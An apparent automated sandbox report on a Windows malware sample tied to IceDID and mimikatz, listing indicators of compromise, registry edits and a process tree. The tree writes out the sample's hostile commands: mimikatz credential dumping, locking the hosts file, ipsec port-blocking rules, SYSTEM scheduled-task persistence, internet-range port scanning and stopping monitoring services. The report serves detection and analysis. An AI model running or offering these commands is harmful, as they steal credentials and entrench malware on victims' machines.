\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dbqlbfrvt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5088 cmd.exe 2388 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000700000002346a-6.dat nsis_installer_2 behavioral2/files/0x0011000000023475-15.dat nsis_installer_1 behavioral2/files/0x0011000000023475-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iacqttm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" iacqttm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ iacqttm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" iacqttm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" iacqttm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" iacqttm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" stiattrir.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump stiattrir.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ iacqttm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" iacqttm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" iacqttm.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2388 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2532 schtasks.exe 5028 schtasks.exe 1952 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3956 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3956 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2316 iacqttm.exe Token: SeDebugPrivilege 3652 iacqttm.exe Token: SeDebugPrivilege 3228 vfshost.exe Token: SeDebugPrivilege 4988 stiattrir.exe Token: SeLockMemoryPrivilege 984 rqwpbp.exe Token: SeLockMemoryPrivilege 984 rqwpbp.exe Token: SeDebugPrivilege 1120 stiattrir.exe Token: SeDebugPrivilege 2356 stiattrir.exe Token: SeDebugPrivilege 2956 stiattrir.exe Token: SeDebugPrivilege 1544 stiattrir.exe Token: SeDebugPrivilege 1096 stiattrir.exe Token: SeDebugPrivilege 780 stiattrir.exe Token: SeDebugPrivilege 2612 stiattrir.exe Token: SeDebugPrivilege 4852 stiattrir.exe Token: SeDebugPrivilege 2280 stiattrir.exe Token: SeDebugPrivilege 2524 stiattrir.exe Token: SeDebugPrivilege 1812 stiattrir.exe Token: SeDebugPrivilege 1440 stiattrir.exe Token: SeDebugPrivilege 2728 stiattrir.exe Token: SeDebugPrivilege 780 stiattrir.exe Token: SeDebugPrivilege 528 stiattrir.exe Token: SeDebugPrivilege 2016 stiattrir.exe Token: SeDebugPrivilege 884 stiattrir.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3956 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe 3956 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe 2316 iacqttm.exe 2316 iacqttm.exe 3652 iacqttm.exe 3652 iacqttm.exe 1412 xohudmc.exe 2428 vanpws.exe 3172 iacqttm.exe 3172 iacqttm.exe 5736 iacqttm.exe 5736 iacqttm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3956 wrote to memory of 5088 3956 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe 86 PID 3956 wrote to memory of 5088 3956 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe 86 PID 3956 wrote to memory of 5088 3956 2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe 86 PID 5088 wrote to memory of 2388 5088 cmd.exe 88 PID 5088 wrote to memory of 2388 5088 cmd.exe 88 PID 5088 wrote to memory of 2388 5088 cmd.exe 88 PID 5088 wrote to memory of 2316 5088 cmd.exe 97 PID 5088 wrote to memory of 2316 5088 cmd.exe 97 PID 5088 wrote to memory of 2316 5088 cmd.exe 97 PID 3652 wrote to memory of 1516 3652 iacqttm.exe 99 PID 3652 wrote to memory of 1516 3652 iacqttm.exe 99 PID 3652 wrote to memory of 1516 3652 iacqttm.exe 99 PID 1516 wrote to memory of 3116 1516 cmd.exe 101 PID 1516 wrote to memory of 3116 1516 cmd.exe 101 PID 1516 wrote to memory of 3116 1516 cmd.exe 101 PID 1516 wrote to memory of 3904 1516 cmd.exe 102 PID 1516 wrote to memory of 3904 1516 cmd.exe 102 PID 1516 wrote to memory of 3904 1516 cmd.exe 102 PID 1516 wrote to memory of 2884 1516 cmd.exe 103 PID 1516 wrote to memory of 2884 1516 cmd.exe 103 PID 1516 wrote to memory of 2884 1516 cmd.exe 103 PID 1516 wrote to memory of 448 1516 cmd.exe 104 PID 1516 wrote to memory of 448 1516 cmd.exe 104 PID 1516 wrote to memory of 448 1516 cmd.exe 104 PID 1516 wrote to memory of 1468 1516 cmd.exe 105 PID 1516 wrote to memory of 1468 1516 cmd.exe 105 PID 1516 wrote to memory of 1468 1516 cmd.exe 105 PID 1516 wrote to memory of 2280 1516 cmd.exe 106 PID 1516 wrote to memory of 2280 1516 cmd.exe 106 PID 1516 wrote to memory of 2280 1516 cmd.exe 106 PID 3652 wrote to memory of 1268 3652 iacqttm.exe 108 PID 3652 wrote to memory of 1268 3652 iacqttm.exe 108 PID 3652 wrote to memory of 1268 3652 iacqttm.exe 108 PID 3652 wrote to memory of 1120 3652 iacqttm.exe 110 PID 3652 wrote to memory of 1120 3652 iacqttm.exe 110 PID 3652 wrote to memory of 1120 3652 iacqttm.exe 110 PID 3652 wrote to memory of 1744 3652 iacqttm.exe 112 PID 3652 wrote to memory of 1744 3652 iacqttm.exe 112 PID 3652 wrote to memory of 1744 3652 iacqttm.exe 112 PID 3652 wrote to memory of 384 3652 iacqttm.exe 116 PID 3652 wrote to memory of 384 3652 iacqttm.exe 116 PID 3652 wrote to memory of 384 3652 iacqttm.exe 116 PID 384 wrote to memory of 5052 384 cmd.exe 118 PID 384 wrote to memory of 5052 384 cmd.exe 118 PID 384 wrote to memory of 5052 384 cmd.exe 118 PID 5052 wrote to memory of 4468 5052 wpcap.exe 119 PID 5052 wrote to memory of 4468 5052 wpcap.exe 119 PID 5052 wrote to memory of 4468 5052 wpcap.exe 119 PID 4468 wrote to memory of 3352 4468 net.exe 121 PID 4468 wrote to memory of 3352 4468 net.exe 121 PID 4468 wrote to memory of 3352 4468 net.exe 121 PID 5052 wrote to memory of 2064 5052 wpcap.exe 122 PID 5052 wrote to memory of 2064 5052 wpcap.exe 122 PID 5052 wrote to memory of 2064 5052 wpcap.exe 122 PID 2064 wrote to memory of 4172 2064 net.exe 124 PID 2064 wrote to memory of 4172 2064 net.exe 124 PID 2064 wrote to memory of 4172 2064 net.exe 124 PID 5052 wrote to memory of 2776 5052 wpcap.exe 125 PID 5052 wrote to memory of 2776 5052 wpcap.exe 125 PID 5052 wrote to memory of 2776 5052 wpcap.exe 125 PID 2776 wrote to memory of 4812 2776 net.exe 127 PID 2776 wrote to memory of 4812 2776 net.exe 127 PID 2776 wrote to memory of 4812 2776 net.exe 127 PID 5052 wrote to memory of 3824 5052 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2124
-
C:\Windows\TEMP\beegewark\rqwpbp.exe"C:\Windows\TEMP\beegewark\rqwpbp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-28_161a8220e035b4149e41fa727c3bb871_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ctnikqfc\iacqttm.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2388
-
-
C:\Windows\ctnikqfc\iacqttm.exeC:\Windows\ctnikqfc\iacqttm.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2316
-
-
-
C:\Windows\ctnikqfc\iacqttm.exeC:\Windows\ctnikqfc\iacqttm.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3116
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:3904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2884
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2280
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1268
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1120
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1744
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\baerflpsi\ngfqdelbf\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Windows\baerflpsi\ngfqdelbf\wpcap.exeC:\Windows\baerflpsi\ngfqdelbf\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3352
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4172
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4812
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:1552
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3104 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4420
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4160 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1468 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2280
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\baerflpsi\ngfqdelbf\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4992 -
C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exeC:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\baerflpsi\ngfqdelbf\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\baerflpsi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\baerflpsi\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4452 -
C:\Windows\baerflpsi\Corporate\vfshost.exeC:\Windows\baerflpsi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tmngtibdz" /ru system /tr "cmd /c C:\Windows\ime\iacqttm.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tmngtibdz" /ru system /tr "cmd /c C:\Windows\ime\iacqttm.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "agrlckqtl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F"2⤵PID:2596
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "agrlckqtl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ctnikqfc\iacqttm.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "taezwrbgz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\beegewark\rqwpbp.exe /p everyone:F"2⤵PID:2424
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1096
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "taezwrbgz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\beegewark\rqwpbp.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5028
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4376
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4600
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5092
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2816
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4232
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2316
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
